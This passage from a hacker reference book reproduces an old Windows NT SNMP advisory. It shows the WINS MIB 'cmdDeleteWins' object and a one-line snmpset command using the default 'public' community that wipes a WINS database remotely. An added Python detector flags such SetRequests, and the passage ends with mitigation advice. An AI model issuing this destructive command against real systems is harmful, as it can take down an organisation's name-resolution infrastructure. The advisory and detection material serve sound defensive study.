Hacker's Desk Reference

Page 348

2. The second exploit demonstrates the ability, via SNMP, to delete all of the records in a WINS database remotely, bypassing all NT security. If you understand large-scale WINS architecture, you can understand the implications of this. Knowledge of the SNMP community strings would allow an attacker to effectively shut down any large NT infrastructure with "N" commands (N = number of WINS servers). This is permitted due to the extensive "cmd" set implemented in the WINS extension agent, specifically:

    cmdDeleteWins OBJECT-TYPE
        SYNTAX      IpAddress
        ACCESS      read-write
        STATUS      mandatory
        DESCRIPTION
            "This variable when set will cause all information pertaining to a WINS
            (data records, context information to be deleted from the local WINS.
            Use this only when owneraddress mapping tables getting to near capacity.
            NOTE: deletion of all information pertaining to the managed WINS is not
            permitted"
        ::= { cmd 3 }

Since the SNMP toolset implemented under NT will not do snmp-set-requests, my sample exploit was done using the CMU SNMP development kit under Unix. The command

    rnjdev02:~/cmu$ snmpset -v 1 192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2

entirely deleted my WINS database.
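As an added defensive example (not code from the advisory or from this book), the following Python parses the BER structure of an SNMPv1 message and flags any SetRequest whose var-binds fall under the WINS MIB "cmd" subtree, 1.3.6.1.4.1.311.1.2.5, which is the prefix of the OID set above; the sample packet is constructed here to match that snmpset command, not taken from a capture.

```python
SET_REQUEST = 0xA3                         # SNMPv1 SetRequest-PDU tag (context [3])
WINS_CMD_PREFIX = "1.3.6.1.4.1.311.1.2.5"  # Microsoft (311) WINS MIB 'cmd' subtree

def read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the BER TLV starting at buf[pos]."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long-form length: next n bytes hold it
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def decode_oid(raw):
    """Decode BER sub-identifiers: first byte packs two arcs, rest are base-128."""
    arcs, value = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:                   # high bit clear = last byte of this arc
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))

def inspect_snmpv1(packet):
    """Summarise one SNMPv1 message and flag SetRequests into the WINS cmd subtree."""
    _, msg, _ = read_tlv(packet, 0)                # Message ::= SEQUENCE
    _, version, pos = read_tlv(msg, 0)             # INTEGER version (0 = v1)
    _, community, pos = read_tlv(msg, pos)         # OCTET STRING community
    pdu_tag, pdu, _ = read_tlv(msg, pos)           # the PDU (tag tells Get/GetNext/Set)
    pos = 0
    for _ in range(3):                             # request-id, error-status, error-index
        _, _, pos = read_tlv(pdu, pos)
    _, varbinds, _ = read_tlv(pdu, pos)            # SEQUENCE OF VarBind
    oids, pos = [], 0
    while pos < len(varbinds):
        _, vb, pos = read_tlv(varbinds, pos)       # VarBind ::= SEQUENCE { name, value }
        _, oid_raw, _ = read_tlv(vb, 0)
        oids.append(decode_oid(oid_raw))
    return {
        "version": int.from_bytes(version, "big"),
        "community": community.decode("latin-1"),
        "pdu_type": pdu_tag,
        "oids": oids,
        "wins_cmd_set": pdu_tag == SET_REQUEST
        and any(o.startswith(WINS_CMD_PREFIX + ".") for o in oids),
    }

# Constructed sample (not a capture): "public", cmdDeleteWins.0 := IpAddress 192.178.16.2
SAMPLE_SET = bytes.fromhex(
    "302e020100" "04067075626c6963" "a321020101020100020100"
    "30163014" "060c2b0601040182370102050300" "4004c0b21002"
)
```

Fed the UDP payloads seen on the agent port, this gives a concrete alert for the set requests the advisory describes, while plain Get/GetNext traffic to the same OIDs is reported but not flagged.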

3. It appears that there are several other pieces of the LMMIB2 definition that allow for things such as remote session deletion or disconnect, etc., but I have not yet looked into them.

4. Stopping the Problem: The simplest fix is to disable SNMP, or to remove the extension agents through the SNMP configuration in the registry. If you MUST use SNMP, then at least block inbound access to that port. Be aware that using NT's various SNMP agents, a malicious intruder could gain knowledge about your
